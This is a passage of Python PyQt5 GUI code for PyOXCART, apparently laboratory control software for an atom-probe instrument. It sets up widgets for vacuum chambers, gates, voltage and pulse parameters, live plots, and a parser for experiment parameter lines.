self.gridLayout.setObjectName("gridLayout")
self.led_main_chamber = QtWidgets.QLabel(self.layoutWidget2)
self.led_main_chamber.setAlignment(QtCore.Qt.AlignCenter)
self.led_main_chamber.setObjectName("led_main_chamber")
self.gridLayout.addWidget(self.led_main_chamber, 0, 0, 1, 1)
self.led_load_lock = QtWidgets.QLabel(self.layoutWidget2)
self.led_load_lock.setAlignment(QtCore.Qt.AlignCenter)
self.led_load_lock.setObjectName("led_load_lock")
self.gridLayout.addWidget(self.led_load_lock, 0, 1, 1, 1)
self.led_cryo = QtWidgets.QLabel(self.layoutWidget2)
self.led_cryo.setAlignment(QtCore.Qt.AlignCenter)
self.led_cryo.setObjectName("led_cryo")
self.gridLayout.addWidget(self.led_cryo, 0, 2, 1, 1)
self.main_chamber_switch = QtWidgets.QPushButton(self.layoutWidget2)
self.main_chamber_switch.setObjectName("main_chamber_switch")
self.gridLayout.addWidget(self.main_chamber_switch, 1, 0, 1, 1)
self.load_lock_switch = QtWidgets.QPushButton(self.layoutWidget2)
self.load_lock_switch.setObjectName("load_lock_switch")
self.gridLayout.addWidget(self.load_lock_switch, 1, 1, 1, 1)
self.cryo_switch = QtWidgets.QPushButton(self.layoutWidget2)
self.cryo_switch.setObjectName("cryo_switch")
self.gridLayout.addWidget(self.cryo_switch, 1, 2, 1, 1)
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(530, 30, 2581, 140))
self.textEdit.setObjectName("textEdit")
self.layoutWidget3 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget3.setGeometry(QtCore.QRect(10, 890, 436, 242))
self.layoutWidget3.setObjectName("layoutWidget3")
self.gridLayout_4 = QtWidgets.QGridLayout(self.layoutWidget3)
self.gridLayout_4.setContentsMargins(0, 0, 0, 0)
self.gridLayout_4.setObjectName("gridLayout_4")
self.label_11 = QtWidgets.QLabel(self.layoutWidget3)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_11.setFont(font)
self.label_11.setObjectName("label_11")
self.gridLayout_4.addWidget(self.label_11, 0, 0, 1, 1)
self.label_12 = QtWidgets.QLabel(self.layoutWidget3)
self.label_12.setObjectName("label_12")
self.gridLayout_4.addWidget(self.label_12, 1, 0, 1, 1)
self.elapsed_time = QtWidgets.QLineEdit(self.layoutWidget3)
self.elapsed_time.setText("")
self.elapsed_time.setObjectName("elapsed_time")
self.gridLayout_4.addWidget(self.elapsed_time, 1, 1, 1, 1)
self.label_13 = QtWidgets.QLabel(self.layoutWidget3)
self.label_13.setObjectName("label_13")
self.gridLayout_4.addWidget(self.label_13, 2, 0, 1, 1)
self.total_ions = QtWidgets.QLineEdit(self.layoutWidget3)
self.total_ions.setText("")
self.total_ions.setObjectName("total_ions")
self.gridLayout_4.addWidget(self.total_ions, 2, 1, 1, 1)
self.label_14 = QtWidgets.QLabel(self.layoutWidget3)
self.label_14.setObjectName("label_14")
self.gridLayout_4.addWidget(self.label_14, 3, 0, 1, 1)
self.speciemen_voltage = QtWidgets.QLineEdit(self.layoutWidget3)
self.speciemen_voltage.setText("")
self.speciemen_voltage.setObjectName("speciemen_voltage")
self.gridLayout_4.addWidget(self.speciemen_voltage, 3, 1, 1, 1)
self.label_16 = QtWidgets.QLabel(self.layoutWidget3)
self.label_16.setObjectName("label_16")
self.gridLayout_4.addWidget(self.label_16, 4, 0, 1, 1)
self.pulse_voltage = QtWidgets.QLineEdit(self.layoutWidget3)
self.pulse_voltage.setText("")
self.pulse_voltage.setObjectName("pulse_voltage")
self.gridLayout_4.addWidget(self.pulse_voltage, 4, 1, 1, 1)
self.label_15 = QtWidgets.QLabel(self.layoutWidget3)
self.label_15.setObjectName("label_15")
self.gridLayout_4.addWidget(self.label_15, 5, 0, 1, 1)
self.detection_rate = QtWidgets.QLineEdit(self.layoutWidget3)
self.detection_rate.setText("")
self.detection_rate.setObjectName("detection_rate")
self.gridLayout_4.addWidget(self.detection_rate, 5, 1, 1, 1)
self.criteria_ions = QtWidgets.QCheckBox(self.centralwidget)
self.criteria_ions.setGeometry(QtCore.QRect(500, 190, 31, 29))
font = QtGui.QFont()
font.setItalic(False)
self.criteria_ions.setFont(font)
self.criteria_ions.setMouseTracking(True)
self.criteria_ions.setText("")
self.criteria_ions.setChecked(True)
self.criteria_ions.setObjectName("criteria_ions")
self.criteria_vdc = QtWidgets.QCheckBox(self.centralwidget)
self.criteria_vdc.setGeometry(QtCore.QRect(500, 320, 31, 29))
font = QtGui.QFont()
font.setItalic(False)
self.criteria_vdc.setFont(font)
self.criteria_vdc.setMouseTracking(True)
self.criteria_vdc.setText("")
self.criteria_vdc.setChecked(True)
self.criteria_vdc.setObjectName("criteria_vdc")
self.criteria_time = QtWidgets.QCheckBox(self.centralwidget)
self.criteria_time.setGeometry(QtCore.QRect(500, 150, 31, 29))
font = QtGui.QFont()
font.setItalic(False)
self.criteria_time.setFont(font)
self.criteria_time.setMouseTracking(True)
self.criteria_time.setText("")
self.criteria_time.setChecked(True)
self.criteria_time.setObjectName("criteria_time")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(11, 16, 490, 850))
self.widget.setObjectName("widget")
self.gridLayout_3 = QtWidgets.QGridLayout(self.widget)
self.gridLayout_3.setContentsMargins(0, 0, 0, 0)
self.gridLayout_3.setObjectName("gridLayout_3")
self.label = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout_3.addWidget(self.label, 0, 0, 1, 2)
self.parameters_source = QtWidgets.QComboBox(self.widget)
self.parameters_source.setObjectName("parameters_source")
self.parameters_source.addItem("")
self.parameters_source.addItem("")
self.gridLayout_3.addWidget(self.parameters_source, 0, 2, 1, 1)
self.label_43 = QtWidgets.QLabel(self.widget)
self.label_43.setObjectName("label_43")
self.gridLayout_3.addWidget(self.label_43, 1, 0, 1, 1)
self.ex_user = QtWidgets.QLineEdit(self.widget)
self.ex_user.setObjectName("ex_user")
self.gridLayout_3.addWidget(self.ex_user, 1, 2, 1, 1)
self.label_21 = QtWidgets.QLabel(self.widget)
self.label_21.setObjectName("label_21")
self.gridLayout_3.addWidget(self.label_21, 2, 0, 1, 1)
self.ex_name = QtWidgets.QLineEdit(self.widget)
self.ex_name.setObjectName("ex_name")
self.gridLayout_3.addWidget(self.ex_name, 2, 2, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widget)
self.label_2.setObjectName("label_2")
self.gridLayout_3.addWidget(self.label_2, 3, 0, 1, 2)
self.ex_time = QtWidgets.QLineEdit(self.widget)
self.ex_time.setObjectName("ex_time")
self.gridLayout_3.addWidget(self.ex_time, 3, 2, 1, 1)
self.label_41 = QtWidgets.QLabel(self.widget)
self.label_41.setObjectName("label_41")
self.gridLayout_3.addWidget(self.label_41, 4, 0, 1, 2)
self.max_ions = QtWidgets.QLineEdit(self.widget)
self.max_ions.setObjectName("max_ions")
self.gridLayout_3.addWidget(self.max_ions, 4, 2, 1, 1)
self.label_3 = QtWidgets.QLabel(self.widget)
self.label_3.setObjectName("label_3")
self.gridLayout_3.addWidget(self.label_3, 5, 0, 1, 2)
self.ex_freq = QtWidgets.QLineEdit(self.widget)
self.ex_freq.setObjectName("ex_freq")
self.gridLayout_3.addWidget(self.ex_freq, 5, 2, 1, 1)
self.label_4 = QtWidgets.QLabel(self.widget)
self.label_4.setObjectName("label_4")
self.gridLayout_3.addWidget(self.label_4, 6, 0, 1, 2)
self.vdc_min = QtWidgets.QLineEdit(self.widget)
self.vdc_min.setObjectName("vdc_min")
self.gridLayout_3.addWidget(self.vdc_min, 6, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.widget)
self.label_5.setObjectName("label_5")
self.gridLayout_3.addWidget(self.label_5, 7, 0, 1, 2)
self.vdc_max = QtWidgets.QLineEdit(self.widget)
self.vdc_max.setObjectName("vdc_max")
self.gridLayout_3.addWidget(self.vdc_max, 7, 2, 1, 1)
self.label_6 = QtWidgets.QLabel(self.widget)
self.label_6.setObjectName("label_6")
self.gridLayout_3.addWidget(self.label_6, 8, 0, 1, 1)
self.vdc_steps_up = QtWidgets.QLineEdit(self.widget)
self.vdc_steps_up.setObjectName("vdc_steps_up")
self.gridLayout_3.addWidget(self.vdc_steps_up, 8, 2, 1, 1)
self.label_28 = QtWidgets.QLabel(self.widget)
self.label_28.setObjectName("label_28")
self.gridLayout_3.addWidget(self.label_28, 9, 0, 1, 1)
self.vdc_steps_down = QtWidgets.QLineEdit(self.widget)
self.vdc_steps_down.setObjectName("vdc_steps_down")
self.gridLayout_3.addWidget(self.vdc_steps_down, 9, 2, 1, 1)
self.label_20 = QtWidgets.QLabel(self.widget)
self.label_20.setObjectName("label_20")
self.gridLayout_3.addWidget(self.label_20, 10, 0, 1, 2)
self.cycle_avg = QtWidgets.QLineEdit(self.widget)
self.cycle_avg.setObjectName("cycle_avg")
self.gridLayout_3.addWidget(self.cycle_avg, 10, 2, 1, 1)
self.label_8 = QtWidgets.QLabel(self.widget)
self.label_8.setObjectName("label_8")
self.gridLayout_3.addWidget(self.label_8, 11, 0, 1, 2)
self.vp_min = QtWidgets.QLineEdit(self.widget)
self.vp_min.setObjectName("vp_min")
self.gridLayout_3.addWidget(self.vp_min, 11, 2, 1, 1)
self.label_9 = QtWidgets.QLabel(self.widget)
self.label_9.setObjectName("label_9")
self.gridLayout_3.addWidget(self.label_9, 12, 0, 1, 2)
self.vp_max = QtWidgets.QLineEdit(self.widget)
self.vp_max.setObjectName("vp_max")
self.gridLayout_3.addWidget(self.vp_max, 12, 2, 1, 1)
self.label_25 = QtWidgets.QLabel(self.widget)
self.label_25.setObjectName("label_25")
self.gridLayout_3.addWidget(self.label_25, 13, 0, 1, 2)
self.pulse_fraction = QtWidgets.QLineEdit(self.widget)
self.pulse_fraction.setObjectName("pulse_fraction")
self.gridLayout_3.addWidget(self.pulse_fraction, 13, 2, 1, 1)
self.label_23 = QtWidgets.QLabel(self.widget)
self.label_23.setObjectName("label_23")
self.gridLayout_3.addWidget(self.label_23, 14, 0, 1, 2)
self.pulse_frequency = QtWidgets.QLineEdit(self.widget)
self.pulse_frequency.setObjectName("pulse_frequency")
self.gridLayout_3.addWidget(self.pulse_frequency, 14, 2, 1, 1)
self.label_17 = QtWidgets.QLabel(self.widget)
self.label_17.setObjectName("label_17")
self.gridLayout_3.addWidget(self.label_17, 15, 0, 1, 2)
self.detection_rate_init = QtWidgets.QLineEdit(self.widget)
self.detection_rate_init.setObjectName("detection_rate_init")
self.gridLayout_3.addWidget(self.detection_rate_init, 15, 2, 1, 1)
self.label_22 = QtWidgets.QLabel(self.widget)
self.label_22.setObjectName("label_22")
self.gridLayout_3.addWidget(self.label_22, 16, 0, 1, 1)
self.doubleSpinBox = QtWidgets.QDoubleSpinBox(self.widget)
self.doubleSpinBox.setObjectName("doubleSpinBox")
self.doubleSpinBox.setMinimum(1.)
self.doubleSpinBox.setMaximum(3.)
self.doubleSpinBox.setSingleStep(0.1)
self.doubleSpinBox.setValue(1)
self.gridLayout_3.addWidget(self.doubleSpinBox, 16, 1, 1, 1)
self.hit_displayed = QtWidgets.QLineEdit(self.widget)
self.hit_displayed.setObjectName("hit_displayed")
self.gridLayout_3.addWidget(self.hit_displayed, 16, 2, 1, 1)
self.label_26 = QtWidgets.QLabel(self.widget)
self.label_26.setObjectName("label_26")
self.gridLayout_3.addWidget(self.label_26, 17, 0, 1, 1)
self.email = QtWidgets.QLineEdit(self.widget)
self.email.setText("")
self.email.setObjectName("email")
self.gridLayout_3.addWidget(self.email, 17, 2, 1, 1)
self.label_27 = QtWidgets.QLabel(self.widget)
self.label_27.setObjectName("label_27")
self.gridLayout_3.addWidget(self.label_27, 18, 0, 1, 1)
self.tweet = QtWidgets.QComboBox(self.widget)
self.tweet.setObjectName("tweet")
self.tweet.addItem("")
self.tweet.addItem("")
self.gridLayout_3.addWidget(self.tweet, 18, 2, 1, 1)
self.label_42 = QtWidgets.QLabel(self.widget)
self.label_42.setObjectName("label_42")
self.gridLayout_3.addWidget(self.label_42, 19, 0, 1, 1)
self.counter_source = QtWidgets.QComboBox(self.widget)
self.counter_source.setObjectName("counter_source")
self.counter_source.addItem("")
self.counter_source.addItem("")
self.counter_source.addItem("")
self.counter_source.addItem("")
self.gridLayout_3.addWidget(self.counter_source, 19, 2, 1, 1)
OXCART.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(OXCART)
self.menubar.setGeometry(QtCore.QRect(0, 0, 3400, 38))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
OXCART.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(OXCART)
self.statusbar.setObjectName("statusbar")
OXCART.setStatusBar(self.statusbar)
self.actionExit = QtWidgets.QAction(OXCART)
self.actionExit.setObjectName("actionExit")
self.menuFile.addAction(self.actionExit)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(OXCART)
QtCore.QMetaObject.connectSlotsByName(OXCART)
#### Set each LCD display to show 8 digits
self.vacuum_main.setDigitCount(8)
self.vacuum_buffer.setDigitCount(8)
self.vacuum_buffer_back.setDigitCount(8)
self.vacuum_load_lock.setDigitCount(8)
self.vacuum_load_lock_back.setDigitCount(8)
self.temp.setDigitCount(8)
arrow1 = pg.ArrowItem(pos=(100, 1700), angle=-90)
# arrow2 = pg.ArrowItem(pos=(100, 2100), angle=90)
arrow3 = pg.ArrowItem(pos=(130, 1800), angle=0)
self.cam_b_o.addItem(arrow1)
# self.cam_b_o.addItem(arrow2)
self.cam_b_o.addItem(arrow3)
arrow1 = pg.ArrowItem(pos=(590, 620), angle=-90)
arrow2 = pg.ArrowItem(pos=(570, 1120), angle=90)
# arrow3 = pg.ArrowItem(pos=(890, 1100), angle=0)
self.cam_s_o.addItem(arrow1)
self.cam_s_o.addItem(arrow2)
# self.cam_s_o.addItem(arrow3)
####
def retranslateUi(self, OXCART):
_translate = QtCore.QCoreApplication.translate
OXCART.setWindowTitle(_translate("OXCART", "PyOXCART"))
###
OXCART.setWindowIcon(QtGui.QIcon('./png/logo3.png'))
###
self.label_7.setText(_translate("OXCART", "Voltage"))
self.start_button.setText(_translate("OXCART", "Start"))
###
self._translate = QtCore.QCoreApplication.translate
self.start_button.clicked.connect(self.thread_main)
self.thread = MainThread()
self.thread.signal.connect(self.finished_thread_main)
self.stop_button.setText(_translate("OXCART", "Stop"))
self.stop_button.clicked.connect(self.stop_ex)
###
self.label_10.setText(_translate("OXCART", "Detection Rate"))
self.label_19.setText(_translate("OXCART", "Visualization"))
self.label_24.setText(_translate("OXCART", "TOF"))
self.label_18.setText(_translate("OXCART", "Diagram"))
self.Error.setText(_translate("OXCART", "<html><head/><body><p><br/></p></body></html>"))
self.label_29.setText(_translate("OXCART", "Overview"))
self.label_30.setText(_translate("OXCART", "Overview"))
self.label_31.setText(_translate("OXCART", "Detail"))
self.label_32.setText(_translate("OXCART", "Detail"))
self.label_33.setText(_translate("OXCART", "Camera Bottom"))
self.label_34.setText(_translate("OXCART", "Camera Side"))
self.light.setText(_translate("OXCART", "Light"))
self.led_light.setText(_translate("OXCART", "light"))
self.label_35.setText(_translate("OXCART", "Main Chamber (mBar)"))
self.label_36.setText(_translate("OXCART", "Buffer Chamber (mBar)"))
self.label_37.setText(_translate("OXCART", "Load lock (mBar)"))
###
self.main_chamber_switch.clicked.connect(lambda: self.gates(1))
self.load_lock_switch.clicked.connect(lambda: self.gates(2))
self.cryo_switch.clicked.connect(lambda: self.gates(3))
self.light.clicked.connect(lambda: self.light_switch())
self.pump_load_lock_switch.clicked.connect(lambda: self.pump_switch())
###
self.label_38.setText(_translate("OXCART", "Temperature (K)"))
self.led_pump_load_lock.setText(_translate("OXCART", "pump"))
self.pump_load_lock_switch.setText(_translate("OXCART", "Load Lock Pump"))
self.label_40.setText(_translate("OXCART", "Buffer Chamber Pre (mBar)"))
self.label_39.setText(_translate("OXCART", "Load Lock Pre(mBar)"))
self.led_main_chamber.setText(_translate("OXCART", "Main"))
self.led_load_lock.setText(_translate("OXCART", "Load"))
self.led_cryo.setText(_translate("OXCART", "Cryo"))
self.main_chamber_switch.setText(_translate("OXCART", "Main Chamber"))
self.load_lock_switch.setText(_translate("OXCART", "Load Lock"))
self.cryo_switch.setText(_translate("OXCART", "Cryo"))
self.textEdit.setHtml(_translate("OXCART", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:7.875pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'JetBrains Mono,monospace\'; font-size:8pt; color:#000000;\">ex_user=user1;</span>ex_name=test1;ex_time=90;max_ions=2000;ex_freq=10;vdc_min=500;vdc_max=4000;vdc_steps_up=100;vdc_steps_down=100;vp_min=328;vp_max=3281;pulse_fraction=20;pulse_frequency=200;detection_rate_init=1;hit_displayed=20000;email=;tweet=No;counter_source=TDC<span style=\" font-family:\'JetBrains Mono,monospace\'; font-size:8pt; color:#000000;\">;criteria_time=True;criteria_ions=False;criteria_vdc=False</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'JetBrains Mono,monospace\'; font-size:8pt; color:#000000;\">ex_user=user2;ex_name=test2;ex_time=100;max_ions=3000;ex_freq=5;vdc_min=1000;vdc_max=3000;vdc_steps_up=50;vdc_steps_down=50;vp_min=400;vp_max=2000;pulse_fraction=15;pulse_frequency=200;detection_rate_init=2;hit_displayed=40000;email=;tweet=No;counter_source=Pulse Counter;criteria_time=False;criteria_ions=False;criteria_vdc=True</span></p></body></html>"))
self.label_11.setText(_translate("OXCART", "Run Statistics"))
self.label_12.setText(_translate("OXCART", "Elapsed Time (S):"))
self.label_13.setText(_translate("OXCART", "Total Ions"))
self.label_14.setText(_translate("OXCART", "Specimen Voltage (V)"))
self.label_16.setText(_translate("OXCART", "Pulse Voltage (V)"))
self.label_15.setText(_translate("OXCART", "Detection Rate (%)"))
self.label.setText(_translate("OXCART", "Setup Parameters"))
self.parameters_source.setItemText(0, _translate("OXCART", "TextBox"))
self.parameters_source.setItemText(1, _translate("OXCART", "TextLine"))
self.label_43.setText(_translate("OXCART", "Experiment User"))
self.ex_user.setText(_translate("OXCART", "user"))
self.label_21.setText(_translate("OXCART", "Experiment Name"))
self.ex_name.setText(_translate("OXCART", "test"))
self.label_2.setText(_translate("OXCART", "Max. Experiment Time (S)"))
self.ex_time.setText(_translate("OXCART", "90"))
self.label_41.setText(_translate("OXCART", "Max. Number of Ions"))
self.max_ions.setText(_translate("OXCART", "2000"))
self.label_3.setText(_translate("OXCART", "Control refresh Freq.(Hz)"))
self.ex_freq.setText(_translate("OXCART", "10"))
self.label_4.setText(_translate("OXCART", "Specimen Start Voltage (V)"))
self.vdc_min.setText(_translate("OXCART", "500"))
self.label_5.setText(_translate("OXCART", "Specimen Stop Voltage (V)"))
self.vdc_max.setText(_translate("OXCART", "4000"))
self.label_6.setText(_translate("OXCART", "K_p Upwards"))
self.vdc_steps_up.setText(_translate("OXCART", "100"))
self.label_28.setText(_translate("OXCART", "K_p Downwards"))
self.vdc_steps_down.setText(_translate("OXCART", "100"))
self.label_20.setText(_translate("OXCART", "Cycle for Avg. (Hz)"))
self.cycle_avg.setText(_translate("OXCART", "10"))
self.label_8.setText(_translate("OXCART", "Pulse Min. Voltage (V)"))
self.vp_min.setText(_translate("OXCART", "328"))
self.label_9.setText(_translate("OXCART", "Pulse Max. Voltage (V)"))
self.vp_max.setText(_translate("OXCART", "3281"))
self.label_25.setText(_translate("OXCART", "Pulse Fraction (%)"))
self.pulse_fraction.setText(_translate("OXCART", "20"))
self.label_23.setText(_translate("OXCART", "Pulse Frequency (KHz)"))
self.pulse_frequency.setText(_translate("OXCART", "200"))
self.label_17.setText(_translate("OXCART", "Detection Rate (%)"))
self.detection_rate_init.setText(_translate("OXCART", "1"))
self.label_22.setText(_translate("OXCART", "# Hits Displayed"))
self.hit_displayed.setText(_translate("OXCART", "20000"))
self.label_26.setText(_translate("OXCART", "Email"))
self.label_27.setText(_translate("OXCART", "Twitter"))
self.tweet.setItemText(0, _translate("OXCART", "No"))
self.tweet.setItemText(1, _translate("OXCART", "Yes"))
self.label_42.setText(_translate("OXCART", "Counter Source"))
self.counter_source.setItemText(0, _translate("OXCART", "TDC"))
self.counter_source.setItemText(1, _translate("OXCART", "TDC_Raw"))
self.counter_source.setItemText(2, _translate("OXCART", "Pulse Counter"))
self.counter_source.setItemText(3, _translate("OXCART", "DRS"))
self.menuFile.setTitle(_translate("OXCART", "File"))
self.actionExit.setText(_translate("OXCART", "Exit"))
# High Voltage visualization ################
self.x_vdc = np.arange(1000) # 1000 time points
self.y_vdc = np.zeros(1000) # 1000 data points
self.y_vdc[:] = np.nan
self.y_vps = np.zeros(1000) # 1000 data points
self.y_vps[:] = np.nan
# Add legend
self.vdc_time.addLegend()
pen_vdc = pg.mkPen(color=(255, 0, 0), width=6)
pen_vps = pg.mkPen(color=(0, 0, 255), width=3)
self.data_line_vdc = self.vdc_time.plot(self.x_vdc, self.y_vdc, name="High Vol.", pen=pen_vdc)
self.data_line_vps = self.vdc_time.plot(self.x_vdc, self.y_vps, name="Pulse Vol.", pen=pen_vps)
self.vdc_time.setBackground('w')
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.vdc_time.setLabel("left", "High Voltage (v)", **styles)
self.vdc_time.setLabel("bottom", "Time (s)", **styles)
# Add grid
self.vdc_time.showGrid(x=True, y=True)
# Add Range
self.vdc_time.setXRange(0, 1000, padding=0.05)
self.vdc_time.setYRange(0, 15000, padding=0.05)
# Detection Visualization #########################
self.x_dtec = np.arange(1000) # 1000 time points
self.y_dtec = np.zeros(1000) # 1000 data points
self.y_dtec[:] = np.nan
pen_dtec = pg.mkPen(color=(255, 0, 0), width=6)
self.data_line_dtec = self.detection_rate_viz.plot(self.x_dtec, self.y_dtec, pen=pen_dtec)
self.detection_rate_viz.setBackground('w')
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.detection_rate_viz.setLabel("left", "Counts", **styles)
self.detection_rate_viz.setLabel("bottom", "Time (s)", **styles)
# Add grid
self.detection_rate_viz.showGrid(x=True, y=True)
# Add Range
self.detection_rate_viz.setXRange(0, 1000, padding=0.05)
self.detection_rate_viz.setYRange(0, 4000, padding=0.05)
# TOF Histogram #########################
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.histogram.setLabel("left", "Frequency (counts)", **styles)
self.histogram.setLabel("bottom", "Time (ns)", **styles)
# Temperature #########################
self.x_tem = np.arange(100) # 100 time points
self.y_tem = np.zeros(100) # 100 data points
self.y_tem[:] = np.nan
pen_dtec = pg.mkPen(color=(255, 0, 0), width=6)
self.data_line_tem = self.temperature.plot(self.x_tem, self.y_tem, pen=pen_dtec)
self.temperature.setBackground('b')
# Add Axis Labels
styles = {"color": "#f00", "font-size": "20px"}
self.temperature.setLabel("left", "Temperature (K)", **styles)
self.temperature.setLabel("bottom", "Time (s)", **styles)
# Add grid
self.temperature.showGrid(x=True, y=True)
# Add Range
self.temperature.setYRange(0, 100, padding=0.1)
# Visualization #####################
self.scatter = pg.ScatterPlotItem(
size=self.doubleSpinBox.value(), brush=pg.mkBrush(255, 255, 255, 120))
self.visualization.getPlotItem().hideAxis('bottom')
self.visualization.getPlotItem().hideAxis('left')
# Timers for updating the cameras, plots, and statistics
self.timer1 = QtCore.QTimer()
self.timer1.setInterval(1000)
self.timer1.timeout.connect(self.update_cameras)
self.timer1.start()
self.timer2 = QtCore.QTimer()
self.timer2.setInterval(1000)
self.timer2.timeout.connect(self.update_plot_data)
self.timer2.start()
self.timer3 = QtCore.QTimer()
self.timer3.setInterval(2000)
self.timer3.timeout.connect(self.statistics)
self.timer3.start()
# Diagram and LEDs ##############
self.diagram_close_all = QPixmap('./png/close_all.png')
self.diagram_main_open = QPixmap('./png/main_open.png')
self.diagram_load_open = QPixmap('./png/load_open.png')
self.diagram_cryo_open = QPixmap('./png/cryo_open.png')
self.led_red = QPixmap('./png/led-red-on.png')
self.led_green = QPixmap('./png/green-led-on.png')
self.diagram.setPixmap(self.diagram_close_all)
self.led_main_chamber.setPixmap(self.led_red)
self.led_load_lock.setPixmap(self.led_red)
self.led_cryo.setPixmap(self.led_red)
self.led_light.setPixmap(self.led_red)
self.led_pump_load_lock.setPixmap(self.led_green)
def thread_main(self):
"""
Main thread for running experiment
"""
def read_update(text_line, index_line):
"""
Function for reading the Textline box
This function is only run if Textline is selected in the GUI
The function read the the text line and put it in the Qboxes
"""
_translate = QtCore.QCoreApplication.translate
text_line = text_line[index_line].split(';')
text_line_b = []
for i in range(len(text_line)):
text_line_b.append(text_line[i].split('='))
for i in range(len(text_line_b)):
if text_line_b[i][0] == 'ex_user':
self.ex_user.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'ex_name':
self.ex_name.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'ex_time':
self.ex_time.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'ex_freq':
self.ex_freq.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'max_ions':
self.max_ions.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_min':
self.vdc_min.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_max':
self.vdc_max.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'detection_rate_init':
self.detection_rate_init.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'pulse_fraction':
self.pulse_fraction.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'pulse_frequency':
self.pulse_frequency.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'hit_displayed':
self.hit_displayed.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'hdf5_path':
self.ex_name.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'email':
self.email.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'cycle_avg':
self.cycle_avg.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_steps_up':
self.vdc_steps_up.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vdc_steps_down':
self.vdc_steps_down.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vp_min':
self.vp_min.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'vp_max':
self.vp_max.setText(_translate("OXCART", text_line_b[i][1]))
if text_line_b[i][0] == 'counter_source':
if text_line_b[i][1] == 'TDC':
self.counter_source.setCurrentIndex(0)
if text_line_b[i][1] == 'TDC_Raw':
self.counter_source.setCurrentIndex(1)
if text_line_b[i][1] == 'Pulse Counter':
self.counter_source.setCurrentIndex(2)
if text_line_b[i][1] == 'DRS':
self.counter_source.setCurrentIndex(3)
if text_line_b[i][0] == 'tweet':
if text_line_b[i][1] == 'NO':
self.tweet.setCurrentIndex(0)
if text_line_b[i][1] == 'Yes':
self.tweet.setCurrentIndex(1)
if text_line_b[i][0] == 'criteria_time':
if text_line_b[i][1] == 'True':
self.criteria_time.setChecked(True)
elif text_line_b[i][1] == 'False':
self.criteria_time.setChecked(False)
if text_line_b[i][0] == 'criteria_ions':
if text_line_b[i][1] == 'True':
self.criteria_ions.setChecked(True)
elif text_line_b[i][1] == 'False':
self.criteria_ions.setChecked(False)
if text_line_b[i][0] == 'criteria_vdc':
if text_line_b[i][1] == 'True':
self.criteria_vdc.setChecked(True)
elif text_line_b[i][1] == 'False':
self.criteria_vdc.setChecked(False)
# check if the gates are closed
if not variables.flag_main_gate and not variables.flag_load_gate and not variables.flag_cryo_gate:
if self.parameters_source.currentText() == 'TextLine' and variables.index_line == 0:
lines = self.textEdit.toPlainText() # Copy all the lines in TextLine
self.text_line = lines.splitlines() # Separate the lines in TextLine
self.num_line = len(self.text_line) # Count the number of lines in TextLine (number of experiments to run)
elif self.parameters_source.currentText() != 'TextLine' and variables.index_line == 0:
self.num_line = 0
self.start_button.setEnabled(False) # Disable the start button in the GUI
variables.plot_clear_flag = True # Change the flag to clear the plots in GUI
# If the TextLine is selected the read_update function is run
if self.parameters_source.currentText() == 'TextLine':
read_update(self.text_line, variables.index_line)
# Update global variables to do the experiments
variables.user_name = self.ex_user.text()
variables.ex_time = int(float(self.ex_time.text()))
variables.ex_freq = int(float(self.ex_freq.text()))
variables.max_ions = int(float(self.max_ions.text()))
variables.vdc_min = int(float(self.vdc_min.text()))
variables.detection_rate = float(self.detection_rate_init.text())
variables.hit_display = int(float(self.hit_displayed.text()))
variables.pulse_fraction = int(float(self.pulse_fraction.text())) / 100
variables.pulse_frequency = float(self.pulse_frequency.text())
variables.hdf5_path = self.ex_name.text()
variables.email = self.email.text()
variables.cycle_avg = int(float(self.cycle_avg.text()))
variables.vdc_step_up = int(float(self.vdc_steps_up.text()))
variables.vdc_step_down = int(float(self.vdc_steps_down.text()))
variables.v_p_min = int(float(self.vp_min.text()))
variables.v_p_max = int(float(self.vp_max.text()))
